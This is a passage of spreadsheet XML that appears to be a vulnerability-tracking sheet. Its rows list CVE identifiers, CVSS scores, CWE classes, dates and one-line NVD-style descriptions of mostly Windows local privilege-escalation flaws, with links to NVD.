      </c>
      <c r="J2127" s="5" t="inlineStr"/>
      <c r="K2127" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="L2127" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69270</t>
        </is>
      </c>
    </row>
    <row r="2128">
      <c r="A2128" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69277</t>
        </is>
      </c>
      <c r="C2128" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2128" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2128" s="5" t="inlineStr"/>
      <c r="F2128" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2128" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2128" s="5" t="inlineStr"/>
      <c r="I2128" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2128" s="5" t="inlineStr"/>
      <c r="K2128" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L2128" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69277</t>
        </is>
      </c>
    </row>
    <row r="2129">
      <c r="A2129" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69283</t>
        </is>
      </c>
      <c r="C2129" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2129" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2129" s="5" t="inlineStr"/>
      <c r="F2129" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2129" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2129" s="5" t="inlineStr"/>
      <c r="I2129" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2129" s="5" t="inlineStr"/>
      <c r="K2129" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2129" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows CD-ROM Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69283</t>
        </is>
      </c>
    </row>
    <row r="2130">
      <c r="A2130" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69284</t>
        </is>
      </c>
      <c r="C2130" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2130" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2130" s="5" t="inlineStr"/>
      <c r="F2130" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2130" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2130" s="5" t="inlineStr"/>
      <c r="I2130" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2130" s="5" t="inlineStr"/>
      <c r="K2130" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2130" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DCOM Server allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69284</t>
        </is>
      </c>
    </row>
    <row r="2131">
      <c r="A2131" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69289</t>
        </is>
      </c>
      <c r="C2131" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2131" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2131" s="5" t="inlineStr"/>
      <c r="F2131" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2131" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2131" s="5" t="inlineStr"/>
      <c r="I2131" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2131" s="5" t="inlineStr"/>
      <c r="K2131" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L2131" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Setup Files Cleanup allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69289</t>
        </is>
      </c>
    </row>
    <row r="2132">
      <c r="A2132" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69290</t>
        </is>
      </c>
      <c r="C2132" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2132" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2132" s="5" t="inlineStr"/>
      <c r="F2132" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2132" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2132" s="5" t="inlineStr"/>
      <c r="I2132" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2132" s="5" t="inlineStr"/>
      <c r="K2132" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L2132" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69290</t>
        </is>
      </c>
    </row>
    <row r="2133">
      <c r="A2133" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69293</t>
        </is>
      </c>
      <c r="C2133" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2133" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2133" s="5" t="inlineStr"/>
      <c r="F2133" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2133" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2133" s="5" t="inlineStr"/>
      <c r="I2133" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2133" s="5" t="inlineStr"/>
      <c r="K2133" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="L2133" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69293</t>
        </is>
      </c>
    </row>
    <row r="2134">
      <c r="A2134" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69295</t>
        </is>
      </c>
      <c r="C2134" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2134" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2134" s="5" t="inlineStr"/>
      <c r="F2134" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2134" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2134" s="5" t="inlineStr"/>
      <c r="I2134" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2134" s="5" t="inlineStr"/>
      <c r="K2134" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="L2134" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69295</t>
        </is>
      </c>
    </row>
    <row r="2135">
      <c r="A2135" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69298</t>
        </is>
      </c>
      <c r="C2135" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2135" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2135" s="5" t="inlineStr"/>
      <c r="F2135" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2135" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H21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135" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2135" s="5" t="inlineStr"/>
      <c r="K2135" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2135" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69298</t>
        </is>
      </c>
    </row>
    <row r="2136">
      <c r="A2136" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69307</t>
        </is>
      </c>
      <c r="C2136" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2136" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2136" s="5" t="inlineStr"/>
      <c r="F2136" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2136" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2136" s="5" t="inlineStr"/>
      <c r="I2136" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2136" s="5" t="inlineStr"/>
      <c r="K2136" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2136" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69307</t>
        </is>
      </c>
    </row>
    <row r="2137">
      <c r="A2137" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69312</t>
        </is>
      </c>
      <c r="C2137" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2137" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2137" s="5" t="inlineStr"/>
      <c r="F2137" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2137" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2137" s="5" t="inlineStr"/>
      <c r="I2137" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2137" s="5" t="inlineStr"/>
      <c r="K2137" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2137" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69312</t>
        </is>
      </c>
    </row>
    <row r="2138">
      <c r="A2138" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69323</t>
        </is>
      </c>
      <c r="C2138" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2138" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2138" s="5" t="inlineStr"/>
      <c r="F2138" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2138" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H213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138" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2138" s="5" t="inlineStr"/>
      <c r="K2138" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2138" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69323</t>
        </is>
      </c>
    </row>
    <row r="2139">
      <c r="A2139" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69324</t>
        </is>
      </c>
      <c r="C2139" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2139" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2139" s="5" t="inlineStr"/>
      <c r="F2139" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2139" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2139" s="5" t="inlineStr"/>
      <c r="I2139" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2139" s="5" t="inlineStr"/>
      <c r="K2139" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-843</t>
        </is>
      </c>
      <c r="L2139" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows Performance Monitor allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69324</t>
        </is>
      </c>
    </row>
    <row r="2140">
      <c r="A2140" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69328</t>
        </is>
      </c>
      <c r="C2140" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2140" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2140" s="5" t="inlineStr"/>
      <c r="F2140" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2140" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2140" s="5" t="inlineStr"/>
      <c r="I2140" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2140" s="5" t="inlineStr"/>
      <c r="K2140" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="L2140" s="5" t="inlineStr">
        <is>
          <t>Untrusted search path in Windows Storage allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69328</t>
        </is>
      </c>
    </row>
    <row r="2141">
      <c r="A2141" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69348</t>
        </is>
      </c>
      <c r="C2141" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2141" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2141" s="5" t="inlineStr"/>
      <c r="F2141" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2141" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2141" s="5" t="inlineStr"/>
      <c r="I2141" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2141" s="5" t="inlineStr"/>
      <c r="K2141" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2141" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69348</t>
        </is>
      </c>
    </row>
    <row r="2142">
      <c r="A2142" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69352</t>
        </is>
      </c>
      <c r="C2142" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2142" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2142" s="5" t="inlineStr"/>
      <c r="F2142" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2142" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2142" s="5" t="inlineStr"/>
      <c r="I2142" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2142" s="5" t="inlineStr"/>
      <c r="K2142" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="L2142" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69352</t>
        </is>
      </c>
    </row>
    <row r="2143">
      <c r="A2143" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69359</t>
        </is>
      </c>
      <c r="C2143" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2143" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2143" s="5" t="inlineStr"/>
      <c r="F2143" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2143" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H2143" s="5" t="inlineStr"/>
      <c r="I2143" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2143" s="5" t="inlineStr"/>
      <c r="K2143" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2143" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Active Directory Domain Services allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69359</t>
        </is>
      </c>
    </row>
    <row r="2144">
      <c r="A2144" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69368</t>
        </is>
      </c>
      <c r="C2144" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2144" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2144" s="5" t="inlineStr"/>
      <c r="F2144" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2144" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2144" s="5" t="inlineStr"/>
      <c r="I2144" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2144" s="5" t="inlineStr"/>
      <c r="K2144" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2144" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Overlay Filter allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69368</t>
        </is>
      </c>
    </row>
    <row r="2145">
      <c r="A2145" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69377</t>
        </is>
      </c>
      <c r="C2145" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2145" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2145" s="5" t="inlineStr"/>
      <c r="F2145" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2145" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2145" s="5" t="inlineStr"/>
      <c r="I2145" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2145" s="5" t="inlineStr"/>
      <c r="K2145" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2145" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69377</t>
        </is>
      </c>
    </row>
    <row r="2146">
      <c r="A2146" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69389</t>
        </is>
      </c>
      <c r="C2146" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2146" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2146" s="5" t="inlineStr"/>
      <c r="F2146" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2146" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2146" s="5" t="inlineStr"/>
      <c r="I2146" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2146" s="5" t="inlineStr"/>
      <c r="K2146" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2146" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Storage Management Provider allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69389</t>
        </is>
      </c>
    </row>
    <row r="2147">
      <c r="A2147" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69391</t>
        </is>
      </c>
      <c r="C2147" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2147" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2147" s="5" t="inlineStr"/>
      <c r="F2147" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2147" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2147" s="5" t="inlineStr"/>
      <c r="I2147" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2147" s="5" t="inlineStr"/>
      <c r="K2147" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L2147" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Broker Infrastructure Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69391</t>
        </is>
      </c>
    </row>
    <row r="2148">
      <c r="A2148" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69392</t>
        </is>
      </c>
      <c r="C2148" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2148" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2148" s="5" t="inlineStr"/>
      <c r="F2148" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2148" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2148" s="5" t="inlineStr"/>
      <c r="I2148" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2148" s="5" t="inlineStr"/>
      <c r="K2148" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2148" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Shell allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69392</t>
        </is>
      </c>
    </row>
    <row r="2149">
      <c r="A2149" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69407</t>
        </is>
      </c>
      <c r="C2149" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2149" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2149" s="5" t="inlineStr"/>
      <c r="F2149" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2149" s="5" t="inlineStr"/>
      <c r="H2149" s="5" t="inlineStr"/>
      <c r="I2149" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2149" s="5" t="inlineStr"/>
      <c r="K2149" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2149" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Volume Manager Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69407</t>
        </is>
      </c>
    </row>
    <row r="2150">
      <c r="A2150" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69420</t>
        </is>
      </c>
      <c r="C2150" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2150" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2150" s="5" t="inlineStr"/>
      <c r="F2150" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2150" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2150" s="5" t="inlineStr"/>
      <c r="I2150" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2150" s="5" t="inlineStr"/>
      <c r="K2150" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2150" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows VOLSNAP.SYS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69420</t>
        </is>
      </c>
    </row>
    <row r="2151">
      <c r="A2151" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69421</t>
        </is>
      </c>
      <c r="C2151" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2151" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2151" s="5" t="inlineStr"/>
      <c r="F2151" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2151" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2151" s="5" t="inlineStr"/>
      <c r="I2151" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2151" s="5" t="inlineStr"/>
      <c r="K2151" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="L2151" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows Kernel Mode Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2151" s="6" t="inlineStr">
        <is>
